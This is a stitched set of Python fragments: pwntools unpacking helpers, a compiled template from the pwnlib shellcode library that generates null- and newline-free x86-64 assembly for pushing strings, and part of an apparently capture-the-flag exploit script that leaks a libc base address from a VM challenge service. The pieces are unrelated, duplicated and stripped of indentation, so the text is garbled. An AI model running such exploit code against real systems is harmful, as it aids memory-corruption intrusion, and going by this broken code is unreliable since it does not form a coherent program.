def u64(self, *a, **kw):
return packing.u64(self.recvn(8), *a, **kw)
def u64(self, address, *a, **kw): return packing.u64(self.read(address, 8), *a, **kw) def u32(self, address, *a, **kw): return packing.u32(self.read(address, 4), *a, **kw)
def render_body(context,string,append_null=True,**pageargs):
__M_caller = context.caller_stack._push_frame()
try:
__M_locals = __M_dict_builtin(pageargs=pageargs,string=string,append_null=append_null)
ord = context.get('ord', UNDEFINED)
hex = context.get('hex', UNDEFINED)
repr = context.get('repr', UNDEFINED)
__M_writer = context.writer()
from pwnlib.util import lists, packing, fiddling
__M_locals_builtin_stored = __M_locals_builtin()
__M_locals.update(__M_dict_builtin([(__M_key, __M_locals_builtin_stored[__M_key]) for __M_key in ['packing','fiddling','lists'] if __M_key in __M_locals_builtin_stored]))
__M_writer(u'\n')
__M_writer(u'\n')
if append_null:
string += '\x00'
if not string:
return
def okay(s):
return '\n' not in s and '\0' not in s
if ord(string[-1]) >= 128:
extend = '\xff'
else:
extend = '\x00'
def pretty(n):
return hex(n & (2 ** 64 - 1))
__M_locals_builtin_stored = __M_locals_builtin()
__M_locals.update(__M_dict_builtin([(__M_key, __M_locals_builtin_stored[__M_key]) for __M_key in ['pretty','okay','string','extend'] if __M_key in __M_locals_builtin_stored]))
__M_writer(u' /* push ')
__M_writer(unicode(repr(string)))
__M_writer(u' */\n')
for word in lists.group(8, string, 'fill', extend)[::-1]:
sign = packing.u64(word, 'little', 'signed')
__M_locals_builtin_stored = __M_locals_builtin()
__M_locals.update(__M_dict_builtin([(__M_key, __M_locals_builtin_stored[__M_key]) for __M_key in ['sign'] if __M_key in __M_locals_builtin_stored]))
if sign in [0, 0xa]:
__M_writer(u' push ')
__M_writer(unicode(sign + 1))
__M_writer(u'\n dec byte ptr [rsp]\n')
elif -0x80 <= sign <= 0x7f and okay(word[0]):
__M_writer(u' push ')
__M_writer(unicode(pretty(sign)))
__M_writer(u'\n')
elif -0x80000000 <= sign <= 0x7fffffff and okay(word[:4]):
__M_writer(u' push ')
__M_writer(unicode(pretty(sign)))
__M_writer(u'\n')
elif okay(word):
__M_writer(u' mov rax, ')
__M_writer(unicode(hex(sign)))
__M_writer(u'\n push rax\n')
elif word[4:] == '\x00\x00\x00\x00':
a,b = fiddling.xor_pair(word[:4], avoid = '\x00\n')
a = packing.u32(a, 'little', 'unsigned')
b = packing.u32(b, 'little', 'unsigned')
__M_locals_builtin_stored = __M_locals_builtin()
__M_locals.update(__M_dict_builtin([(__M_key, __M_locals_builtin_stored[__M_key]) for __M_key in ['a','b'] if __M_key in __M_locals_builtin_stored]))
__M_writer(u' push ')
__M_writer(unicode(pretty(a)))
__M_writer(u'\n xor dword ptr [rsp], ')
__M_writer(unicode(pretty(b)))
__M_writer(u'\n')
else:
a,b = fiddling.xor_pair(word, avoid = '\x00\n')
a = packing.u64(a, 'little', 'unsigned')
b = packing.u64(b, 'little', 'unsigned')
__M_locals_builtin_stored = __M_locals_builtin()
__M_locals.update(__M_dict_builtin([(__M_key, __M_locals_builtin_stored[__M_key]) for __M_key in ['a','b'] if __M_key in __M_locals_builtin_stored]))
__M_writer(u' mov rax, ')
__M_writer(unicode(pretty(a)))
__M_writer(u'\n push rax\n mov rax, ')
__M_writer(unicode(pretty(b)))
__M_writer(u'\n xor [rsp], rax\n')
return ''
finally:
context.caller_stack._pop_frame()
def u64(self, address, *a, **kw):
"""Unpacks an integer from the specified ``address``."""
return packing.u64(self.read(address, 8), *a, **kw)
s.send('\x04')
s.readuntil('\n')
# select VM1
s.readuntil('\n')
s.send('\x01')
s.readuntil('A\n')
code = ''
code += vm_asm(VM1_OPCODE_MOV, arg_reg(REG_ES), arg_imm(0x800))
code += vm_asm(VM1_OPCODE_MOV, arg_reg(REG_AX), arg_imm(0x8))
code += vm_asm(VM1_OPCODE_OUT)
code += vm_asm(VM1_OPCODE_HLT)
send(code)
libc_base = u64(s.recv(8)) - 0x6f690
#########################
# leak done
#########################
# clear VM1
s.readuntil('\n')
s.send('\x04')
# clear VM2
s.readuntil('\n')
s.send('\x05')
# clear VM3
s.readuntil('\n')